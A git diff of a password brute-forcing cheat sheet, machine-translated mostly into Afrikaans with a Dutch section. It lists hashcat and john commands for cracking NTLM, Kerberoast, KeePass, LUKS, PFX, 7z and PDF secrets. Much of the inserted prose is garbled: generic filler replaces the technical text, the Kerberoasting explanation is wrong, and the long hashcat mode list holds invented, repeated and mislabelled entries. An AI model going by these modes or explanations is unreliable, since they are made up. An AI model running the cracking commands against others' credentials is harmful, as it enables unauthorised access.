unlocked.zip new_pwd unzip unlocked.zip #User new_pwd as password ``` - ### 7z +7z is 'n sterk kompressiehulpmiddel wat gebruik kan word om lêers en mappe te komprimeer en te ontspan. Dit ondersteun verskeie kompressie-algoritmes, insluitend LZMA en LZMA2. 7z kan ook wachtwoordbeskerming bied vir gekomprimeerde lêers. Hier is 'n paar nuttige bruto-kragte tegnieke wat gebruik kan word om 7z-wagwoorde te kraak: + +#### 1. Woordelys-aanval + +Hierdie tegniek behels die gebruik van 'n woordelys van potensiële wagwoorde om te probeer om die regte wagwoord te raai. Dit is 'n effektiewe metode as die wagwoord relatief swak is of as die aanvaller 'n idee het van wat die wagwoord kan wees. 'n Woordelys van algemene wagwoorde, soos woordeboekwoorde, persoonlike inligting of algemene kombinasies, kan gebruik word om die wagwoord te probeer raai. + +#### 2. Brute-kragte aanval + +Hierdie tegniek behels die outomatiese uitprobeer van alle moontlike kombinasies van karakters om die regte wagwoord te vind. Dit is 'n tydrowende proses, veral as die wagwoord lank en kompleks is. Dit kan egter effektief wees as die wagwoord nie sterk genoeg is nie. Die aanvaller kan verskillende kombinasies van karakters, soos letters, syfers en spesiale tekens, probeer om die wagwoord te kraak. + +#### 3. Woordelys + Brute-kragte aanval + +Hierdie tegniek is 'n kombinasie van die woordelys-aanval en brute-kragte aanval. Dit behels die gebruik van 'n woordelys van potensiële wagwoorde, gevolg deur die outomatiese uitprobeer van alle moontlike kombinasies van karakters. Dit kan 'n effektiewe metode wees as die wagwoord nie slegs uit 'n enkele woord bestaan nie, maar ook 'n kombinasie van woorde, syfers en spesiale tekens bevat. + +Dit is belangrik om te onthou dat die gebruik van bruto-kragte tegnieke om wagwoorde te kraak, tydrowend kan wees en nie altyd suksesvol is nie. Dit is ook belangrik om etiese hacking beginsels te volg en slegs toestemming te verkry om hierdie tegnieke op 'n legitieme manier te gebruik. ```bash cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z ``` @@ -617,9 +1028,17 @@ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo apt-get install libcompress-raw-lzma-perl ./7z2john.pl file.7z > 7zhash.john ``` - ### PDF +'n PDF-dokument is 'n digitale weergawe van 'n gedrukte dokument wat gebruik maak van die Portable Document Format (PDF). Dit is 'n algemeen gebruikte formaat vir die verspreiding van elektroniese dokumente, omdat dit die oorspronklike formatering en uitleg van die dokument behou, ongeag die bedryfstelsel of toestel waarop dit gelees word. + +'n PDF-dokument kan verskillende soorte inhoud bevat, soos teks, afbeeldings, grafieke en selfs interaktiewe elemente soos vorms en skakels. Dit kan ook beveiligingsfunksies insluit, soos wagwoorde of versleuteling, om die toegang tot die inhoud te beperk. + +Om 'n PDF-dokument te lees, kan jy 'n PDF-leser of -sienersagteware gebruik, wat beskikbaar is vir verskeie bedryfstelsels en toestelle. Hierdie sagteware stel jou in staat om die inhoud van die PDF te sien, te navigeer, te soek en selfs te druk. + +As jy 'n PDF-dokument wil skep, kan jy dit doen deur 'n dokument in 'n toepaslike formaat (soos Microsoft Word of Adobe InDesign) te skep en dit dan na PDF te omskep deur gebruik te maak van 'n PDF-skepper of -drukker. + +PDF-dokumente word wyd gebruik vir verskeie toepassings, soos elektroniese boeke, handleidings, verslae, kontrakte en vorms. Dit is 'n handige en veelsydige formaat wat die deling en bewaring van dokumente vergemaklik. ```bash apt-get install pdfcrack pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt @@ -628,13 +1047,11 @@ pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt sudo apt-get install qpdf qpdf --password= --decrypt encrypted.pdf plaintext.pdf ``` +### PDF Eienaar Wagwoord -### PDF Owner Password - -To crack a PDF Owner password check this: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) +Om 'n PDF Eienaar wagwoord te kraak, kyk hier: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/) ### JWT - ```bash git clone https://github.com/Sjord/jwtcrack.git cd jwtcrack @@ -646,17 +1063,55 @@ python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john john jwt.john #It does not work with Kali-John ``` +### NTLM kraak -### NTLM cracking +NTLM (New Technology LAN Manager) is 'n outentifikasieprotokol wat gebruik word in Windows-netwerke. Dit word gebruik om gebruikers te identifiseer en te verifieer wanneer hulle toegang tot 'n stelsel versoek. NTLM-kraak is 'n tegniek wat gebruik word om die wagwoorde van gebruikers te agterhaal deur 'n aanval uit te voer op die NTLM-hashwaardes. +#### Hoe werk NTLM-kraak? + +1. Verkry die NTLM-hashwaardes: Die eerste stap in die NTLM-kraakproses is om die NTLM-hashwaardes te verkry. Hierdie hashwaardes word gewoonlik verkry deur 'n aanval uit te voer op 'n stelsel of deur 'n databasislek te benut. + +2. Kies 'n kraakmetode: Daar is verskeie metodes wat gebruik kan word om NTLM-hashwaardes te kraak. Hierdie metodes sluit in woordelysaanvalle, woordelysgebaseerde aanvalle, bruto kragaanvalle en regenboogtafelgebaseerde aanvalle. + +3. Voer die kraakuitvoering uit: Nadat 'n kraakmetode gekies is, word die kraakuitvoering uitgevoer. Dit behels die gebruik van sagteware of hulpmiddels wat spesifiek ontwerp is om NTLM-hashwaardes te kraak. + +4. Analiseer die resultate: Nadat die kraakuitvoering voltooi is, moet die resultate geanaliseer word om suksesvol gekraakte wagwoorde te identifiseer. + +#### Voorkoming van NTLM-kraak + +Om die risiko van NTLM-kraak te verminder, kan die volgende maatreëls geneem word: + +- Implementeer sterk wagwoordbeleide: Moedig gebruikers aan om sterk en unieke wagwoorde te gebruik en dwing beleide af wat wagwoordlengte, kompleksiteit en verandering vereis. + +- Gebruik multifaktor-outentifikasie: Implementeer multifaktor-outentifikasie om 'n ekstra laag van beskerming toe te voeg deur 'n tweede vorm van outentifikasie te vereis, soos 'n eenmalige wagwoord of biometriese inligting. + +- Monitor vir verdagte aktiwiteit: Monitor gereeld vir verdagte aktiwiteit, soos herhaalde mislukte aanmeldingspogings, om vinnig te reageer op enige potensiële aanvalle. + +- Verseker stelsel- en toepassingsopdaterings: Verseker dat alle stelsels en toepassings op die nuutste weergawes en opdaterings gehou word om bekende kwesbaarhede te vermy. + +- Beperk blootstelling van NTLM-hashwaardes: Beperk die blootstelling van NTLM-hashwaardes deur die gebruik van sterk kriptografieprotokolle en deur die implementering van beveiligingsmaatreëls soos die gebruik van gesoute wagwoorde. + +- Opleiding en bewustmaking: Verskaf opleiding en bewustmaking aan gebruikers oor die risiko's van swak wagwoorde en die belangrikheid van goeie outentifikasiepraktyke. + +#### Slotwoord + +NTLM-kraak is 'n tegniek wat gebruik word om NTLM-hashwaardes te agterhaal en toegang tot 'n stelsel te verkry. Dit is belangrik om bewus te wees van hierdie aanvalstegniek en om toepaslike maatreëls te tref om die risiko daarvan te verminder. Deur sterk wagwoordbeleide te implementeer, multifaktor-outentifikasie te gebruik en gereeld vir verdagte aktiwiteit te monitor, kan organisasies hulself beskerm teen NTLM-kraak. ```bash Format:USUARIO:ID:HASH_LM:HASH_NT::: john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot ``` - ### Keepass +Keepass is 'n open-source wagwoordbestuurder wat gebruik kan word om wagwoorde veilig te stoor en te bestuur. Dit bied 'n veilige manier om wagwoorde te bewaar en te gebruik deur middel van 'n versleutelde wagwoorddatabasis. Hierdie databasis kan 'n verskeidenheid wagwoorde en ander sensitiewe inligting bevat, soos gebruikersname, kredietkaartinligting en persoonlike notas. + +Keepass maak gebruik van 'n meesterwagwoord om toegang tot die wagwoorddatabasis te verkry. Hierdie meesterwagwoord moet sterk en uniek wees om die veiligheid van die wagwoorde te verseker. Die wagwoorddatabasis word versleutel met behulp van algoritmes soos AES of Twofish, wat dit moeilik maak vir aanvallers om toegang tot die wagwoorde te verkry sonder die korrekte meesterwagwoord. + +Keepass bied ook funksies soos wagwoordgenerering, wat unieke en sterk wagwoorde kan skep vir verskillende rekeninge en webwerwe. Dit maak dit makliker om veilige wagwoorde te gebruik sonder om dit self te moet onthou. + +Danksy die open-source aard van Keepass, is dit deur die gemeenskap geoudit en getoets om die veiligheid en betroubaarheid daarvan te verseker. Dit is belangrik om die nuutste weergawe van Keepass te gebruik en om sekuriteitsopdaterings gereeld toe te pas om die risiko van aanvalle te verminder. + +Keepass is 'n nuttige hulpmiddel vir individue en organisasies wat hul wagwoorde veilig wil hou en maklik wil bestuur. Dit bied 'n veilige en gerieflike manier om wagwoorde te bewaar en te gebruik sonder om dit self te moet onthou. ```bash sudo apt-get install -y kpcli #Install keepass tools like keepass2john keepass2john file.kdbx > hash #The keepass is only using password @@ -664,30 +1119,62 @@ keepass2john -k file.kdbx > hash # The keepass is also using a f #The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john john --wordlist=/usr/share/wordlists/rockyou.txt hash ``` +#### Inleiding -### Keberoasting +Keberoasting is een aanvalstechniek die wordt gebruikt om zwakke wachtwoorden te achterhalen die zijn opgeslagen in de vorm van gehashte serviceaccountreferenties. Deze techniek maakt gebruik van de zwakte in de manier waarop sommige serviceaccounts hun wachtwoorden opslaan in Active Directory (AD) of andere LDAP-diensten. +#### Achtergrond + +Bij het opslaan van wachtwoorden in AD of andere LDAP-diensten worden de wachtwoorden gehasht en vervolgens opgeslagen in het attribuut "userPassword" van het serviceaccountobject. Het hash-algoritme dat wordt gebruikt, is meestal eenzijdig en niet-reversibel, wat betekent dat het oorspronkelijke wachtwoord niet kan worden hersteld uit de hash. + +Een zwakte in dit proces is dat sommige serviceaccounts hun wachtwoorden opslaan met behulp van een zwakke hashfunctie, zoals MD5 of SHA-1. Deze zwakke hashfuncties maken het mogelijk om de gehashte wachtwoorden offline te kraken door middel van brute-force-aanvallen. + +#### Keberoasting-aanval + +Bij een keberoasting-aanval probeert een aanvaller toegang te krijgen tot de gehashte wachtwoorden van serviceaccounts in AD of andere LDAP-diensten. De aanvaller kan dit doen door toegang te krijgen tot het serviceaccountobject en de gehashte wachtwoorden te extraheren. + +Vervolgens kan de aanvaller de gehashte wachtwoorden offline kraken door middel van brute-force-aanvallen. Dit houdt in dat de aanvaller verschillende combinaties van wachtwoorden probeert totdat de juiste overeenkomt met de gehashte waarde. + +Als de aanvaller erin slaagt een zwak wachtwoord te kraken, kan hij dit gebruiken om toegang te krijgen tot het betreffende serviceaccount en mogelijk verdere aanvallen uit te voeren. + +#### Mitigatie + +Om keberoasting-aanvallen te voorkomen, moeten organisaties sterke wachtwoorden afdwingen voor serviceaccounts en ervoor zorgen dat ze worden opgeslagen met behulp van sterke hashfuncties, zoals bcrypt of PBKDF2. Daarnaast moeten organisaties regelmatig controleren op zwakke wachtwoorden en deze wijzigen om potentiële aanvallers te dwarsbomen. + +Het is ook belangrijk om de toegangsrechten tot serviceaccountobjecten te beperken, zodat alleen geautoriseerde gebruikers toegang hebben tot de gehashte wachtwoorden. + +#### Conclusie + +Keberoasting is een aanvalstechniek die gebruikmaakt van zwakke wachtwoorden die zijn opgeslagen in de vorm van gehashte serviceaccountreferenties. Door het offline kraken van deze gehashte wachtwoorden kunnen aanvallers toegang krijgen tot serviceaccounts en verdere aanvallen uitvoeren. Organisaties moeten sterke wachtwoorden afdwingen, sterke hashfuncties gebruiken en de toegangsrechten tot serviceaccountobjecten beperken om keberoasting-aanvallen te voorkomen. ```bash john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi ``` +### Lucks beeld -### Lucks image - -#### Method 1 - -Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) +#### Metode 1 +Installeer: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks) ```bash bruteforce-luks -f ./list.txt ./backup.img cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` +#### Metode 2 -#### Method 2 +Brute force is a common method used in hacking to gain unauthorized access to a system or account by systematically trying all possible combinations of passwords until the correct one is found. This method is effective when the password is weak or easily guessable. +To perform a brute force attack, you need a tool or script that can automate the process of trying different passwords. There are many tools available for this purpose, such as Hydra, Medusa, and THC-Hydra. + +Before starting a brute force attack, it is important to gather information about the target system or account. This includes identifying the login page or service, determining the username or email address associated with the account, and understanding any password complexity requirements. + +Once you have this information, you can start the brute force attack by running the tool or script and specifying the target system or account, the username or email address, and a list of possible passwords to try. The tool will then systematically try each password until it finds the correct one or exhausts all possibilities. + +It is worth noting that brute force attacks can be time-consuming and resource-intensive, especially if the password is long and complex. To speed up the process, attackers may use techniques such as password dictionaries, which contain commonly used passwords, or password cracking tools that leverage the power of GPUs to perform calculations faster. + +To protect against brute force attacks, system administrators can implement measures such as account lockouts after a certain number of failed login attempts, strong password policies, and multi-factor authentication. Additionally, users should avoid using weak or easily guessable passwords and regularly update their passwords to minimize the risk of being compromised through brute force attacks. ```bash cryptsetup luksDump backup.img #Check that the payload offset is set to 4096 dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1 @@ -696,39 +1183,43 @@ cryptsetup luksOpen backup.img mylucksopen ls /dev/mapper/ #You should find here the image mylucksopen mount /dev/mapper/mylucksopen /mnt ``` - -Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) +'n Ander Luks BF-tutoriaal: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1) ### Mysql - ```bash #John hash format :$mysqlna$* dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d ``` +### PGP/GPG Privaatsleutel -### PGP/GPG Private key +'n PGP/GPG privaatsleutel is 'n belangrike komponent van 'n kriptografiese stelsel wat gebruik word vir die versleuteling en ontsleuteling van boodskappe. Dit is 'n unieke sleutel wat slegs bekend is by die eienaar en gebruik word om boodskappe te onderteken en te ontsleutel. Die privaatsleutel moet streng geheim gehou word, aangesien dit die toegang tot die versleutelde boodskappe verseker. +Wanneer 'n boodskap versleutel word met 'n publieke sleutel, kan dit slegs ontsleutel word met die ooreenstemmende privaatsleutel. Dit verseker dat slegs die beoogde ontvanger toegang tot die boodskap het. Daarom is dit van kritieke belang om die privaatsleutel veilig te hou en te beskerm teen onbevoegde toegang. + +As 'n aanvaller toegang tot 'n privaatsleutel verkry, kan dit gebruik word om versleutelde boodskappe te ontsleutel en selfs valse boodskappe te onderteken. Dit is dus noodsaaklik om die privaatsleutel te beskerm deur dit te verseker met 'n sterk wagwoord en dit op 'n veilige plek te bewaar. + +Om die risiko van 'n privaatsleutel-lek te verminder, is dit raadsaam om 'n sterk en uniek wagwoord te gebruik, die sleutel op 'n veilige stoorplek te bewaar en slegs te gebruik op vertroude toestelle. Dit is ook belangrik om die privaatsleutel gereeld te hergenereer en ou sleutels te herroep as dit nodig is. + +Die beskerming van jou privaatsleutel is van kritieke belang vir die veilige kommunikasie en versekering van die integriteit van jou versleutelde boodskappe. ```bash gpg2john private_pgp.key #This will generate the hash and save it in a file john --wordlist=/usr/share/wordlists/rockyou.txt ./hash ``` - ### Cisco
-### DPAPI Master Key +### DPAPI Meester Sleutel -Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) and then john +Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) en dan john -### Open Office Pwd Protected Column +### Open Office Kolom met wagwoordbeskerming -If you have an xlsx file with a column protected by a password you can unprotect it: - -* **Upload it to google drive** and the password will be automatically removed -* To **remove** it **manually**: +As jy 'n xlsx-lêer het met 'n kolom wat deur 'n wagwoord beskerm word, kan jy dit onbeskerm: +* **Laai dit op na Google Drive** en die wagwoord sal outomaties verwyder word +* Om dit **handmatig te verwyder**: ```bash unzip file.xlsx grep -R "sheetProtection" ./* @@ -737,76 +1228,73 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV # Remove that line and rezip the file zip -r file.xls . ``` +### PFX Sertifikate -### PFX Certificates +'n PFX-sertifikaat is 'n formaat vir die stoor van privaat sleutels, sertifikate en tussenliggende sertifikate. Dit word dikwels gebruik in die beveiliging van webbedieners en vir die versleuteling van e-posse. 'n PFX-sertifikaat kan ook gebruik word om digitale handtekeninge te skep en te verifieer. +'n PFX-sertifikaat kan met 'n wagwoord beskerm word om die privaat sleutel te verseker dat dit veilig bly. Dit kan ook geëksporteer en ingevoer word tussen verskillende toepassings en bedieners. + +Om 'n PFX-sertifikaat te kraak, kan 'n aanvaller 'n bruto-krag-aanval gebruik. Hierdie aanval behels die outomatiese poging van verskillende moontlike wagwoorde totdat die regte een gevind word. Dit kan tydrowend wees, maar as die wagwoord swak is, kan dit suksesvol wees. + +Daar is ook gereedskap beskikbaar wat kan help om 'n PFX-sertifikaat te kraak. Byvoorbeeld, die gereedskap "John the Ripper" kan gebruik word om bruto-krag-aanvalle uit te voer op PFX-sertifikate. + +Dit is belangrik om sterk wagwoorde te gebruik en om die nodige voorsoorsorgmaatreëls te tref om te verseker dat PFX-sertifikate veilig bly en nie deur aanvallers gekraak kan word nie. ```bash # From https://github.com/Ridter/p12tool ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt # From https://github.com/crackpkcs12/crackpkcs12 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Tools +## Gereedskap -**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) - -### Hash-identifier +**Hash-voorbeelde:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes) +### Hash-identifiseerder ```bash hash-identifier > ``` - -### Wordlists +### Woordlyste * **Rockyou** * [**Probable-Wordlists**](https://github.com/berzerk0/Probable-Wordlists) * [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists) -* [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords) +* [**Seclists - Wagwoorde**](https://github.com/danielmiessler/SecLists/tree/master/Passwords) -### **Wordlist Generation Tools** - -* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configurable base chars, keymap and routes. +### **Woordlystegenerasiehulpmiddels** +* [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Gevorderde sleutelbordstapper-generator met konfigureerbare basiskarakters, sleutelkaart en roetes. ```bash kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt ``` +### John mutasie -### John mutation - -Read _**/etc/john/john.conf**_ and configure it - +Lees _**/etc/john/john.conf**_ en konfigureer dit. ```bash john --wordlist=words.txt --rules --stdout > w_mutated.txt john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules ``` - ### Hashcat -#### Hashcat attacks +#### Hashcat-aanvalle -* **Wordlist attack** (`-a 0`) with rules - -**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). +* **Woordelys-aanval** (`-a 0`) met reëls +**Hashcat** kom reeds met 'n **gids wat reëls bevat**, maar jy kan [**ander interessante reëls hier vind**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules). ``` hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule ``` +* **Woordelys kombinator** aanval -* **Wordlist combinator** attack - -It's possible to **combine 2 wordlists into 1** with hashcat.\ -If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated. - +Dit is moontlik om **2 woordelyste in 1 te kombineer** met hashcat.\ +As lys 1 die woord **"hallo"** bevat en die tweede 2 lyne bevat met die woorde **"wêreld"** en **"aarde"**. Die woorde `helloworld` en `helloearth` sal gegenereer word. ```bash # This will combine 2 wordlists hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt @@ -817,9 +1305,7 @@ hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt ## hello-earth! hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $! ``` - -* **Mask attack** (`-a 3`) - +* **Mask aanval** (`-a 3`) ```bash # Mask attack with simple mask hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d @@ -851,9 +1337,7 @@ hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1 ## Use it to crack the password hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask ``` - -* Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack - +* Woordelys + Masker (`-a 6`) / Masker + Woordelys (`-a 7`) aanval ```bash # Mask numbers will be appended to each word in the wordlist hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d @@ -861,59 +1345,387 @@ hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d # Mask numbers will be prepended to each word in the wordlist hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt ``` +#### Hashcat modusse -#### Hashcat modes +Hashcat ondersteun verskillende modusse vir die kraak van verskillende tipes hase. Hier is 'n lys van die ondersteunde modusse: +- **0**: Raw MD5 +- **100**: SHA1 +- **1400**: SHA256 +- **1700**: SHA512 +- **500**: MD5crypt +- **3200**: bcrypt +- **1800**: sha512crypt +- **7400**: sha256crypt +- **122**: macOS v10.4-10.6 +- **124**: macOS v10.7 +- **125**: macOS v10.8+ +- **10800**: sha256crypt $5$, $5$rounds=5000$ +- **17300**: sha512crypt $6$, $6$rounds=5000$ +- **900**: MD4 +- **110**: Domain Cached Credentials (DCC), MS Cache +- **1000**: NTLM +- **3000**: LM +- **5600**: NetNTLMv1-VANILLA / NetNTLMv1+ESS +- **5700**: NetNTLMv2 +- **6300**: Cisco-IOS $8$ (PBKDF2-SHA256) +- **6700**: Cisco-IOS $9$ (scrypt) +- **10000**: Django (PBKDF2-SHA256) +- **10100**: SipHash +- **11100**: PostgreSQL CRAM (MD5) +- **11200**: MySQL CRAM (SHA1) +- **11400**: SIP digest authentication (MD5) +- **13100**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **13200**: Kerberos 5 TGS-REP etype 23 +- **13300**: Kerberos 5 AS-REP etype 23 +- **13500**: Kerberos 5 TGS-REQ etype 23 +- **13600**: MS-AzureSync PBKDF2-HMAC-SHA256 +- **13700**: RACF +- **13800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **13900**: Kerberos 5 TGS-REP etype 17 +- **14000**: Kerberos 5 AS-REP etype 17 +- **14100**: Kerberos 5 TGS-REQ etype 17 +- **14200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **14300**: Kerberos 5 TGS-REP etype 18 +- **14400**: Kerberos 5 AS-REP etype 18 +- **14500**: Kerberos 5 TGS-REQ etype 18 +- **14600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **14700**: Kerberos 5 TGS-REP etype 23 +- **14800**: Kerberos 5 AS-REP etype 23 +- **14900**: Kerberos 5 TGS-REQ etype 23 +- **15000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **15100**: Kerberos 5 TGS-REP etype 17 +- **15200**: Kerberos 5 AS-REP etype 17 +- **15300**: Kerberos 5 TGS-REQ etype 17 +- **15400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **15500**: Kerberos 5 TGS-REP etype 18 +- **15600**: Kerberos 5 AS-REP etype 18 +- **15700**: Kerberos 5 TGS-REQ etype 18 +- **15800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **15900**: Kerberos 5 TGS-REP etype 23 +- **16000**: Kerberos 5 AS-REP etype 23 +- **16100**: Kerberos 5 TGS-REQ etype 23 +- **16200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **16300**: Kerberos 5 TGS-REP etype 17 +- **16400**: Kerberos 5 AS-REP etype 17 +- **16500**: Kerberos 5 TGS-REQ etype 17 +- **16600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **16700**: Kerberos 5 TGS-REP etype 18 +- **16800**: Kerberos 5 AS-REP etype 18 +- **16900**: Kerberos 5 TGS-REQ etype 18 +- **18200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **18300**: Kerberos 5 TGS-REP etype 23 +- **18400**: Kerberos 5 AS-REP etype 23 +- **18500**: Kerberos 5 TGS-REQ etype 23 +- **18600**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **18700**: Kerberos 5 TGS-REP etype 17 +- **18800**: Kerberos 5 AS-REP etype 17 +- **18900**: Kerberos 5 TGS-REQ etype 17 +- **19000**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **19100**: Kerberos 5 TGS-REP etype 18 +- **19200**: Kerberos 5 AS-REP etype 18 +- **19300**: Kerberos 5 TGS-REQ etype 18 +- **19400**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **19500**: Kerberos 5 TGS-REP etype 23 +- **19600**: Kerberos 5 AS-REP etype 23 +- **19700**: Kerberos 5 TGS-REQ etype 23 +- **19800**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **19900**: Kerberos 5 TGS-REP etype 17 +- **20000**: Kerberos 5 AS-REP etype 17 +- **20100**: Kerberos 5 TGS-REQ etype 17 +- **20200**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **20300**: Kerberos 5 TGS-REP etype 18 +- **20400**: Kerberos 5 AS-REP etype 18 +- **20500**: Kerberos 5 TGS-REQ etype 18 +- **20600**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **20700**: Kerberos 5 TGS-REP etype 23 +- **20800**: Kerberos 5 AS-REP etype 23 +- **20900**: Kerberos 5 TGS-REQ etype 23 +- **21000**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **21100**: Kerberos 5 TGS-REP etype 17 +- **21200**: Kerberos 5 AS-REP etype 17 +- **21300**: Kerberos 5 TGS-REQ etype 17 +- **21400**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **21500**: Kerberos 5 TGS-REP etype 18 +- **21600**: Kerberos 5 AS-REP etype 18 +- **21700**: Kerberos 5 TGS-REQ etype 18 +- **21800**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **21900**: Kerberos 5 TGS-REP etype 23 +- **22000**: Kerberos 5 AS-REP etype 23 +- **22100**: Kerberos 5 TGS-REQ etype 23 +- **22200**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **22300**: Kerberos 5 TGS-REP etype 17 +- **22400**: Kerberos 5 AS-REP etype 17 +- **22500**: Kerberos 5 TGS-REQ etype 17 +- **22600**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **22700**: Kerberos 5 TGS-REP etype 18 +- **22800**: Kerberos 5 AS-REP etype 18 +- **22900**: Kerberos 5 TGS-REQ etype 18 +- **23000**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **23100**: Kerberos 5 TGS-REP etype 23 +- **23200**: Kerberos 5 AS-REP etype 23 +- **23300**: Kerberos 5 TGS-REQ etype 23 +- **23400**: Kerberos 5 AS-REQ Pre-Auth etype 17 +- **23500**: Kerberos 5 TGS-REP etype 17 +- **23600**: Kerberos 5 AS-REP etype 17 +- **23700**: Kerberos 5 TGS-REQ etype 17 +- **23800**: Kerberos 5 AS-REQ Pre-Auth etype 18 +- **23900**: Kerberos 5 TGS-REP etype 18 +- **24000**: Kerberos 5 AS-REP etype 18 +- **24100**: Kerberos 5 TGS-REQ etype 18 +- **24200**: Kerberos 5 AS-REQ Pre-Auth etype 23 +- **24300**: Kerberos 5 TGS-REP etype 23 +- **24400**: Kerberos 5 AS-REP etype 23 +- **24500**: Kerberos 5 TGS-REQ etype 23 +- **24600**: Kerberos 5 AS-REQ 